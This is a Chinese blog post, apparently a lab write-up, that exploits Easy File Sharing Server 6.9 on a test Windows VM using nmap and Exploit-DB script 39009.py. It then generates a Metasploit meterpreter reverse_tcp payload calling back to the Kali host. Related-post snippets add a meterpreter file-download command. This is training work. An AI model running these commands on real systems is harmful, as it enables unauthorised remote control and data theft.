easy file sharing server漏洞渗透测试及Metasploit应用

已于 2022-11-07 20:33:56 修改
阅读量403 收藏 1
点赞数
文章标签: 服务器 网络 运维
于 2022-11-06 21:49:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzzfff__/article/details/127721780
版权

一  easy file sharing server漏洞渗透测试

1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。

2、利用Nmap扫描发现靶机(Windows)运行了该服务。

3、利用该漏洞,使得靶机运行计算器。

  1. 查看靶机的ip地址为192.168.226.132

  

2.靶机打开easy file sharing server,打开kali终端,输入【nmap -sV 192.168.226.132】进行扫描,发现靶机上的80端口运行着“easy file sharing server”软件,版本为6.9

3.输入【searchsploit easy file sharing server】查找和easy file sharing server有关的漏洞,以红框标出来的漏洞渗透模块为例,利用该漏洞,使得靶机运行计算器。

 4.执行这个python脚本,执行时需要提供两个参数(靶机ip和目标端口),输入【python2 /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.226.132 80】,该命令执行成功后,渗透模块就会连接到192.168.226.132的80端口,并将指定代码发送过去

 

 5.回到靶机查看,可发现已经启动了计算器

二 Metasploit应用

1、生成主控端、被控端。
2、获得靶机(Windows)控制权。
3、下载靶机上任意一个文件。

  1. 查看kali虚拟机的ip地址为192.168.226.128

2.输入命令msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.226.128 lport=5000 -f exe -o /var/payload.exe

生成的被控端程序文件在var目录下

 

 

 

3.输入msfconsole命令启动Metasploit

 4.依次输入这些命令

 

 

 

_read_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Easy File Sharing Server漏洞利用
rrorb的博客
11-14 4348
1、以windows系统作为靶机并运行easy file sharing server 2、使用nmap对Windows进行端口扫描 nmap -sV10.**.***.**(windowsip) 扫描到80端口运行了easy file sharing server 3、搜索可利用漏洞脚本 searchsploit Easy File Sharing Web Server 扫描到很多可利用脚本,这里我们选取其中一个作为漏洞脚本利用 4、分析脚本,脚本39009.py使用python编程
metasploit中使用lnk漏洞渗透测试.doc
03-18
metasploit中使用lnk漏洞渗透测试.doc
easy.file.sharing.web.server.v6.9.rar.7z
12-14
Easy File Sharing Web Server允许用户不需要任何附加的软件或服务就可以架设一个安全的、基于网页的P2P文件分享、传输系统。 除了HTML网页界面设计,Easy File Sharing Web Server还可以让你直接在自己的PC上快速架起一个网站,你可以用它来和朋友们分享照片、音乐、视频,还可以让其它用户通过一个简单的网页界面上传自己的收藏到你的PC伤,真正达到分享资源的目的。
easy file sharing server漏洞利用
m0_56368726的博客
11-07 393
1、首先在winxp靶机上安装efssetup_2018.zip,并运行 2、扫描靶机进行的服务 使用nmap进行主动扫描,命令为nmap -sV 192.168.56.131。 可以看到靶机的80端口提供的服务为easy file sharing server。 3、查找漏洞渗透模块 我们可以用“searchsploit"命令在kali中查找所需要的渗透模块。 我们这里以这个漏洞渗透模块为例,这个脚本使用python写的,利用溢出漏洞实现了在靶机执行计算器程序。 ...
Easy File Sharing Web Server漏洞渗透测试
qq_51634663的博客
12-15 458
复现环境 1、ExpNIS.Windos(靶机) 2、Easy File Sharing Web Server 6.9(软件) 3、Kali-Linux(攻击机) 漏洞复现 1、首先在靶机上安装软件Easy File Sharing Web Server 2018并打开(安装过程较为简单此处不详细说明) 2、在靶机上安装完成后我们还需要找到该靶机,在kali上使用nmap扫描该网段 3、发现靶机IP后,我们使用命令nmap -sV 【目标IP】查看该目标主机上运行的服务,例如在此处我.
复现任务A(漏洞渗透测试Metasploit应用)
qq_61793472的博客
11-20 379
网络渗透测试课,复现任务A
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
介绍Metasploit使用方法,进行各种各样的渗透测试
渗透测试Metasploit
06-16
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序...
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-web渗透6.pdf 渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试...
复现任务A
m0_65354386的博客
11-17 232
靶机(Windows)漏洞渗透测试Metasploit应用
FZEasyFile:在沙箱中创建、写入和删除文件的简单方法
06-06
FZEasy文件 在沙箱中创建、写入和删除文件的简单方法。 #它是什么? 直接用iOS的sdk来管理文件,很乏味,很枯燥,不可读。 FZEasyFile 提供了一种在沙箱中创建或覆盖文件的简单方法。 如果你想创建一个文件,你只需告诉 FZEasyFile 你的文件名,即“my/file/path/info.txt”。 您无需关心根目录是什么或目录“my/file/path/”是否存在。 实际上,沙箱中的根目录是“Documents”,如果“my/file/path”不存在,则会自动创建。 #Usage ###Import 源文件将“FZEasyFile.h”和“FZEasyFile.m”拖到您的项目中。 并在源文件中导入 .h 文件: # import " FZEasyFile.h " ###测试文件是否存在 [EasyFile isFileExists: @" my/file/
简单漏洞复现_网络渗透测试
Radiency的博客
11-23 1522
利用easy file sharing server服务漏洞;远程控制目标,生成主控端、被控端,获得靶机控制权。
网络渗透测试复现任务
m0_73936732的博客
11-22 653
复现任务
漏洞渗透测试复现 easy file sharing server
m0_62659165的博客
11-22 694
漏洞渗透测试复现 easy file sharing server
网络渗透测试漏洞复现任务
m0_64229840的博客
11-21 434
1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。 2、利用Nmap扫描发现靶机(Windows)运行了该服务。P99-100。3、利用该漏洞,使得靶机运行计算器。P116-119
Metasploit应用
m0_64005272的博客
11-05 686
使用命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.131.128 lport=5000 -f exe -o /var/payload.exe。接下来输入命令:download C:\\hh.txt /home/ 下载hh.txt文件到home文件夹里。lhost的值为Kali的ip,保存的位置为:/var/payload.exe。结果在home文件夹中找到hh.txt。在var文件目录下找到payload.exe。
漏洞渗透测试(efssetup_2018.zip)
qq_53639387的博客
11-15 2364
1.我们尽量在vm中安装一个win系统的虚拟机,因为这个测试安装在我们的物理机上有一定的风险。在虚拟机win7上安装好vmware tool,那样我们就可以直接拖文件进虚拟机里面了 在win7中安装easy file sharing server(efssetup_2018.zip)一直下一步就好,不用购买,点try it 2.用ipconfig命令得靶机的IP 3.打开kali终端 nmap 目标靶机ip地址/24,发现了80端口开放着http服务 4.然后用nmap -...
攻击篇--远程控制(一)生成被控端与主控端
qq_40424448的博客
06-03 4457
笑脸漏洞与6200 如果目标主机被使用笑脸漏洞成功渗透,那么会自动在6200端口打开一个连接,可以实现攻击者对目标主机的控制。这是一个很经典的案例,如果将这个连接比作是正好能让一个人爬行通过,那么接下来的远程控制篇就是如何将这个缺口变大,大的卡车都可以自由出入。而这个大的入口,就是我们平常所说的远程控制。 netcat ......
metasploit渗透测试
最新发布
08-02
Metasploit是一个渗透测试工具,也是信息安全与渗透测试领域...总的来说,Metasploit是一个功能强大的渗透测试工具,可以帮助安全专业人员评估系统的安全性,并提供了丰富的漏洞攻击工具和模块,以支持渗透测试工作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值